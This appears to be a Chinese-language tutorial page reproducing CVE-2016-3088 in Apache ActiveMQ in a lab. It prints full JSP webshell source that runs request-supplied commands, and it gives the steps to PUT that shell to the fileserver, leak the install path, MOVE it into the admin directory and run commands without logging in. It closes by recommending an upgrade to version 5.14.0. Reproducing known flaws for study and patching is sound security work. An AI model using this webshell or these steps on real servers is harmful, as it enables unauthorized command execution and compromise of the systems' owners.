主頁 > 知識庫 > Apache ActiveMQ任意文件寫入漏洞(CVE-2016-3088)復(fù)現(xiàn)

Apache ActiveMQ任意文件寫入漏洞(CVE-2016-3088)復(fù)現(xiàn)

熱門標(biāo)簽:承德地圖標(biāo)注公司 地圖標(biāo)注如何改成微信號 靈圖uu電子寵物店地圖標(biāo)注 虛假地圖標(biāo)注 濮陽好的聯(lián)通400電話申請 地圖標(biāo)注黃河的位置 山東企業(yè)外呼系統(tǒng)公司 400電話號碼辦理多少錢 百度地圖標(biāo)注公司位置要多少錢

一、漏洞描述

該漏洞出現(xiàn)在fileserver應(yīng)用中,漏洞原理:ActiveMQ中的fileserver服務(wù)允許用戶通過HTTP PUT方法上傳文件到指定目錄。Fileserver支持寫入文件(不解析jsp),但是支持移動文件(Move)我們可以將jsp的文件PUT到Fileserver下,然后再通過Move指令移動到可執(zhí)行目錄下訪問。

二、漏洞影響版本

Apache ActiveMQ 5.0.0 - 5.13.2

三、漏洞環(huán)境搭建

1、官網(wǎng)下載apache-activemq-5.7.0-bin.tar 下載地址:http://activemq.apache.org/download-archives.html

2、解壓

3、啟動,進入bin目錄下,運行./activemq start

  

4、瀏覽器訪問http://192.168.10.149:8161/,如下圖可以看到成功搭建環(huán)境

  

四、漏洞復(fù)現(xiàn)

1、PUT上傳一個jsp的webshell到fileserver目錄,下圖可以看到成功上傳jsp文件

Jsp文件內(nèi)容:

<%@ page import="java.io.*"%>
<%
 out.print("Hello</br>");
 String strcmd=request.getParameter("cmd");
 String line=null;
 Process p=Runtime.getRuntime().exec(strcmd);
 BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));
 while((line=br.readLine())!=null){
 out.print(line+"</br>");
 }
%>

  

2、瀏覽器訪問http://192.168.10.149:8161/fileserver/1.jsp,下圖可以看到fileserver目錄下的webshell沒有被解析,說明fileserver目錄沒有執(zhí)行權(quán)限

  

3、利用該版本存在物理路徑泄露漏洞,爆一下絕對路徑

  

4、利用Move方法將webshell移入admin目錄下,如下圖所示成功把文件移入到admin目錄

  

5、利用該版本存在的未授權(quán)訪問漏洞,不用登錄,訪問http://192.168.10.149:8161/admin/1.jsp?cmd=ls,下圖可以看到成功執(zhí)行命令

  

五、漏洞防御

1、ActiveMQ Fileserver 的功能在 5.14.0 及其以后的版本中已被移除。建議用戶升級至 5.14.0 及其以后版本。

---------------------------------------------------------------------------------

參考: https://www.secpulse.com/archives/60064.html

總結(jié)

以上所述是小編給大家介紹的Apache ActiveMQ任意文件寫入漏洞(CVE-2016-3088)復(fù)現(xiàn),希望對大家有所幫助,如果大家有任何疑問請給我留言,小編會及時回復(fù)大家的。在此也非常感謝大家對腳本之家網(wǎng)站的支持!
如果你覺得本文對你有幫助,歡迎轉(zhuǎn)載,煩請注明出處,謝謝!

標(biāo)簽:德宏 安康 福州 樂山 淮安 泰安 上海 鷹潭

巨人網(wǎng)絡(luò)通訊聲明:本文標(biāo)題《Apache ActiveMQ任意文件寫入漏洞(CVE-2016-3088)復(fù)現(xiàn)》,本文關(guān)鍵詞  Apache,ActiveMQ,任意,文件,;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問題,煩請?zhí)峁┫嚓P(guān)信息告之我們,我們將及時溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò),涉及言論、版權(quán)與本站無關(guān)。
  • 相關(guān)文章
  • 下面列出與本文章《Apache ActiveMQ任意文件寫入漏洞(CVE-2016-3088)復(fù)現(xiàn)》相關(guān)的同類信息!
  • 本頁收集關(guān)于Apache ActiveMQ任意文件寫入漏洞(CVE-2016-3088)復(fù)現(xiàn)的相關(guān)信息資訊供網(wǎng)民參考!
  • 推薦文章